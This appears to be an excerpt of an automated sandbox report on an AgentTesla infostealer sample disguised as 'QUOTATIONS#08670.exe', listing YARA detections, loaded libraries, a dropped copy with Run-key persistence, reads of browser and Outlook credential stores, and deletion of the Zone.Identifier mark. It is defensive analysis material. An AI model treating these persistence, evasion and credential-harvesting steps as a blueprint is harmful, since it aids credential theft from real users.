                  Source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/3@2/2
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATIONS#08670.exe.logJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMutant created: NULL
                  Source: QUOTATIONS#08670.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: QUOTATIONS#08670.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: QUOTATIONS#08670.exeReversingLabs: Detection: 23%
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile read: C:\Users\user\Desktop\QUOTATIONS#08670.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\QUOTATIONS#08670.exe "C:\Users\user\Desktop\QUOTATIONS#08670.exe"
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess created: C:\Users\user\Desktop\QUOTATIONS#08670.exe "C:\Users\user\Desktop\QUOTATIONS#08670.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess created: C:\Users\user\Desktop\QUOTATIONS#08670.exe "C:\Users\user\Desktop\QUOTATIONS#08670.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: QUOTATIONS#08670.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: QUOTATIONS#08670.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: QUOTATIONS#08670.exeStatic file information: File size 1330176 > 1048576
                  Source: QUOTATIONS#08670.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x133a00
                  Source: QUOTATIONS#08670.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Yara detected DarkTortilla Crypter
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3abdaa0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.4e50000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.4e50000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3abdaa0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.2575069317.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2575551377.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2019882237.0000000004E50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2008575393.0000000002691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATIONS#08670.exe PID: 7592, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 6576, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 3820, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_008FC9A4 push ebp; ret 0_2_008FC9A5
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_008FC9F0 push ebp; ret 0_2_008FC9F1
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_0712BB1B push ecx; retf EFCDh0_2_0712BC92
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_071EC1B7 push eax; iretd 0_2_071EC1C6
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_071EA014 pushad ; retf 0_2_071EA06D
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_071E7E59 push ecx; retf 0046h0_2_071E7E7A
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_01460C55 push edi; retf 4_2_01460C7A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_02F6C9F0 push ebp; ret 8_2_02F6C9F1
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_02F6C9A4 push ebp; ret 8_2_02F6C9A5
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_06223370 push eax; iretd 8_2_06223371
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_06222F71 push esp; retf 8_2_06222F72
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_077D2379 push cs; ret 8_2_077D238F
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_077DBB27 push ecx; retf EFCDh8_2_077DBC92
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0789C1B7 push eax; iretd 8_2_0789C1C6
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0789A014 pushad ; retf 8_2_0789A06D
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07897E59 push ecx; retf 0046h8_2_07897E7A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB05A1 push es; retf 0007h8_2_07CB05A2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB0541 push es; retf 0007h8_2_07CB0542
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB94D1 push esp; retf 0007h8_2_07CB94D2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB94F1 push esp; retf 0007h8_2_07CB94F2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB9389 push esp; retf 0007h8_2_07CB938A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB22D1 push cs; retf 0007h8_2_07CB22D2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB22AE push cs; retf 0007h8_2_07CB22B2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB8F17 push ebx; retf 0007h8_2_07CB8F1A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB8EE9 push ebx; retf 0007h8_2_07CB8EEA
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB8EA9 push ebx; retf 0007h8_2_07CB8EAA
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB8E30 push ebx; retf 0007h8_2_07CB8E32
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CBFDB2 push FFFFFF8Bh; iretd 8_2_07CBFDB7
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB8C69 push edx; retf 0007h8_2_07CB8C6A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB8B77 push ecx; retf 0007h8_2_07CB8B7A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB8AC9 push ecx; retf 0007h8_2_07CB8ACA
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile created: C:\Users\user\AppData\Roaming\newapp\newapp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newappJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newappJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\Desktop\QUOTATIONS#08670.exe\:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe\:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe\:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
